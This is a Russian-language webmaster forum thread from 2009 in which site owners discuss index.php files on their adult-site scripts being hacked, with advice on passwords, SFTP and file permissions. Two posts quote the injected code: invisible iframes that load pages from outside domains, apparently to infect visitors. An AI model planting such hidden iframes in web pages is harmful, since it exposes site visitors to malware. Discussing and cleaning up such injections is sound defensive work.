Прощай рейтинг
С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808
|
Добавлено: 04/06/09 в 22:16 |
Скрипт ATS 1.8 ротатор Thumbnail Manager Live 1.3
Открываю щас морду своего сиджа, а там заместо сиджа надпись
Parse error: syntax error, unexpected '<' in /home/adults/public_html/index.php on line 9.
Посмотрел файл index
Код: |
<?php
$header = '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>';
@include('in.php');
@include($page);
<iframe src="http://combinebet.cn:8080/index.php" width=197 height=138 style="visibility: hidden"><
<iframe src="http://thebestwaytofind.cn:8080/index.php" width=142 height=151 style="visibility: hidden"></iframe> |
стер я эти два чюдесных инфрейма
теперь голову ломаю что это за херня такая была
|
|
|
|
С нами с 30.04.06
Сообщения: 3096
Рейтинг: 2025
|
Добавлено: 04/06/09 в 22:21 |
Еще аз зайди посмотри, может тебе это еще кудато прописали и через некоторое время опять восстановится.
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 04/06/09 в 22:23 |
Ломанули видать, только ифрейм неграмотно написали, лишний < поставили ... Пни админов, пусть смотрят логи, хотя я не помню - если ats генерит индекс сам - хуй они уже чё там найдут, скорее всего, если логи не за неделю хранятся, конечно ...
|
|
|
|
Прощай рейтинг
С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808
|
Добавлено: 04/06/09 в 22:54 |
Woland: Скорее всего не дописали просто /iframe>
Но тем не менее именно из за этой < качерги они спалились
|
|
|
|
С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013
|
Добавлено: 05/06/09 в 12:31 |
Посмотри владельца index.php. Сам ATS не меняеят. Если владелец не httpd, то твой FTP ассоunt известен еще кому-то. Меняй пароли и чисти комп от вирусов, а вообще юзай SSH и SCP
|
|
|
|
С нами с 12.12.02
Сообщения: 25
Рейтинг: 17
|
Добавлено: 09/06/09 в 13:53 |
ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе
|
|
|
|
С нами с 02.03.06
Сообщения: 68
Рейтинг: -2
|
Добавлено: 16/06/09 в 08:50 |
возможно там в скриптах есть код, который все это дерьмо обновляет, попробуй вычистить все скрипты и установить заново.
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 16/06/09 в 09:58 |
Цитата: | ААА... Помогите, поймал ету фигню с ифреймоми (код появляется во всех index файлах). Менял пароли, проверял на вирусы (Пандой и Spybot - Search & Destroy)... Но нет, появляется каждое утро на всех FTP. Что делать не знаю, подскажите кто в курсе |
Пинать админов - пусть смотрят логи, что (кто) пишет в файлы и откуда (с сервака или из вне). Если с сервака - удалять, если извне - менять пароли, ограничивать доступ по IP, убирать нахуй ftp протокол с сервера, яростно чистить свой комп и т.д.
|
|
|
|
С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013
|
Добавлено: 16/06/09 в 14:41 |
На индекс файл поставить права 444
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 16/06/09 в 15:03 |
Цитата: | На индекс файл поставить права 444 |
если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему
|
|
|
|
С нами с 21.03.08
Сообщения: 720
Рейтинг: 1013
|
Добавлено: 16/06/09 в 15:23 |
Woland писал: | если я правильно помню - у ats индекс генерится скриптом и 444 будут не в тему |
Неправльно помниш, ATS не генерит индекс.
|
|
|
|
С нами с 29.07.03
Сообщения: 426
Рейтинг: 512
|
Добавлено: 16/06/09 в 23:48 |
L.Estel писал: | Неправльно помниш, ATS не генерит индекс. |
И никогда не генерил, создавал при установке и больше не трогал. Но в последней версии index.php идет в дистрибутиве, и о взломе 1.8 я пока не слышал, да и 1.7.2 достаточно надежен.
Так что это либо через фтп залезли, либо с соседнего аккаунта, если хост шареный, 444 в этом случае помогут. Еще можно на templates/*.tpl поставить 444, для спокойного сна. Но если по фтп лезут - не спасет, естественно.
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 16/06/09 в 23:56 |
Оффтопик: Ну ладно, ладно ... Я тут пытаюсь какеров на ложный след навести - и от те на, нарисовались, правдолюбы ...
Если серьёзно - ну да, запамятовал, с кем не бывает
|
|
|
|
С нами с 12.12.02
Сообщения: 25
Рейтинг: 17
|
Добавлено: 17/06/09 в 19:49 |
Спасибо за ваши ответы... Вот ещё один вопрос, посоветуйте пожалуста менеджер чтоб безопасно загружать файлы на FTP. Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание...
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 17/06/09 в 22:18 |
Цитата: | Все которые я использовал они сохраняют все логины и пароли, а есть разовые, безопасные заходы без сохранения паролей. очень плохо разбираюсь в этих делах, спасибо за понимание... |
WinSCP http://winscp.net/eng/download.php не запоминает пароли, если не нажать специально "save", много умеет, бесплатен.
Но лучше не использовать ftp вообще (не поднимать на серваке, это к админам), а юзать sftp скажем, с помощью того же клиента.
|
|
|
|
С нами с 05.04.07
Сообщения: 556
Рейтинг: 381
|
Добавлено: 19/06/09 в 11:31 |
Короче я тебя Очень растрою!
У меня на одном серваке, очень похожая хрень появилась года полтора назад. Что ни делали, все пох. С периодичностью в 2-3 месяца эта хрень появляеться в коде. Как ее побороть ни я ни админы незнают. Что тока не делали поменяли железо и все напрасно,... это блин как герпесс, вроде все поличил а рано или позно всерано вылазит ))))
САМ ГЕРПЕСОМ НЕ СТРАДАЮ, написал для сравнения.
Чаще всего в топах протона.
Спасение тока в чмодах 444 на все шаблоны и страницы,...
кста вот мой код, может кто что и мне посоветует
<iframe src=\"http://niklejo.net/?click=DDBD90\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://internetcountercheck.com/?click=16010546\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 19/06/09 в 12:44 |
Цитата: | Короче я тебя Очень растрою!
...
...
... |
Очень драматичная история, как админы на сервере или ты у себя на компе закладку найти не можешь полтора года - только зачем его то расстраивать ?
|
|
|
|
С нами с 12.12.02
Сообщения: 25
Рейтинг: 17
|
Добавлено: 25/06/09 в 16:09 |
Всем спасибо, пока все ОК (тфу-тфу-тфу). Надеюсь так и будет.
|
|
|
|
Прощай рейтинг
С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808
|
Добавлено: 25/06/09 в 20:28 |
А мне вот интересно домены зон (cn) неприкасаемые?
В этой доменной зоне что разрешено распространять вирусы?
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 27/06/09 в 14:32 |
Mad Knight: Это китай Там ничего нельзя, но всё можно
Абузы могут читать только на китайском, например
|
|
|
|
Прощай рейтинг
С нами с 30.11.08
Сообщения: 3180
Рейтинг: 808
|
Добавлено: 27/06/09 в 16:52 |
Woland: Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум.
Сволочи они, а не китайцы
|
|
|
|
Soul's Buyer
С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740
|
Добавлено: 27/06/09 в 17:11 |
Цитата: | Как с порно бороться дак это они первые, а как вирусы убирать так извините мы китайцы и по английски не бум бум. | Оффтопик: А что тебя удивляет - в порно всё понятно без слов, в этом одна из причин его популярности
|
|
|
|